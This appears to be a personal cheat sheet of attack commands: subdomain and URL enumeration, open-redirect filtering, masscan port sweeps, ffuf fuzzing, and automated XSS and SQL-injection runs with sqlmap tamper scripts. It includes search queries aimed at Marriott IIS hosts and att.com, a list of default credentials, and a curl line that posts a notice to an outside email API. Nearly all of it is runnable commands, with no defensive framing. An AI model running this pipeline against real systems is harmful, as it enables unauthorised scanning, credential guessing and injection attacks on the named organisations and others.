nano /home/alex/.config/subfinder/provider-config.yaml ctrl+o-enter-ctrl+x

make:	screen -ls
	screen -S 1

go:	screen -ls
	screen -r -d 1234.1

time (<command>)

source ~/.bashrc

subfinder -dL wildcard.txt -recursive -o subdomain.txt -s securitytrails,crtsh,alienvault,anubis,commoncrawl,digitorus,dnsdumpster,hackertarget,rapiddns,sitedossier,waybackarchive && shuf subdomain.txt -o temp.txt && mv temp.txt subdomain.txt && httpx -l subdomain.txt -mc 200 -o filter.txt

katana -u filter.txt -d 5 -fs rdn -kf all -jc -iqp -o urls2.txt; curl -X POST https://api.proxynova.com/v1/send_email -H "Content-Type: application/x-www-form-urlencoded" --data "to=agungsstrpaypal@gmail.com&from=vps&subject=vps&message=00000000000000alex01urls2.txt" & cat filter.txt | gau --retries 5 --timeout 30 --o urls.txt &

shuf urls.txt -o temp.txt && mv temp.txt urls.txt

head -n 100 urls.txt >> result.txt && sed -i '1,100d' urls.txt



cat urls.txt | gf or | sed 's/=.*/=/' | grep -E 'redir|url|dest|r=|go=|goto|go_to|continue|next|location|return|forward|target|uri|image_url|link|checkout' | uro > or.txt

sudo python3 autoor.py -l or.txt -o autoor.txt -t 4

cat autoor.txt | grep -E 'Success'



ssl:"Marriott International Inc." product:"Microsoft IIS httpd"

awk '!seen[$0]++' ips.txt > temp.txt && mv temp.txt ips.txt && shuf ips.txt -o temp.txt && mv temp.txt ips.txt

python3 autoshortscan.py -l ips.txt -o short.txt -t 10 && sed -i 's/.*/\L&/' short.txt

python3 autoscraper.py -l shortname.txt

ffuf -w iis.txt -u https://site.com/FUZZ -c -v -mc 200,302,301,403,401

/(?i)(shortname[a-z0-9-_]+\.zip)/
/(?i)(shortname[a-z0-9-_]+)/

(dns.names:"att.com") and not labels=`ipv6`

sudo masscan -iL ips.txt -p80,443,8080,8443,5000,5010,3000,8081,8082,8090,8888,50000,9000,9200,27017,5005,3306,5432,6379,27018,9001,10000,20000,50070,10050,1514,4200,4567,3001,7070,8088,5900,8000 --rate=1000

ffuf -w fuzz.txt -u https://IP:5010/FUZZ -c -v -recursion

admin:admin		root:root
test:test		user:pwd
username:password	subdomain.att.com:subdomain.att.com



(^|^[^:]+:\/\/|[^\.]+\.)TARGET.*

mitmproxy -s httphistory.py && rm -rf __pycache__


sed '/Method:/d;/HTTP Version:/d;/Request Body:/d;/Request Headers:User-Agent:/d' httphistory.txt >> httpxss.txt

nano wafwaf.txt && python3 adderpayloads.py && rm -rf wafwaf.txt

python3 autoxssvibes.py -l httpxss.txt >> autoxssvibes.txt

grep -A 3 " VULNERABLE: " autoxssvibes.txt


python3 httpsqli.py

python3 httpsqli2.py && rm -rf filtered_httphistory.txt

python3 autosqlmap.py -l formatted_httphistory.txt -o autosqlmap.txt -t <tamper>

CTRL+W	= "    Payload: "
	= "might be vulnerable to cross-site scripting (XSS) attacks"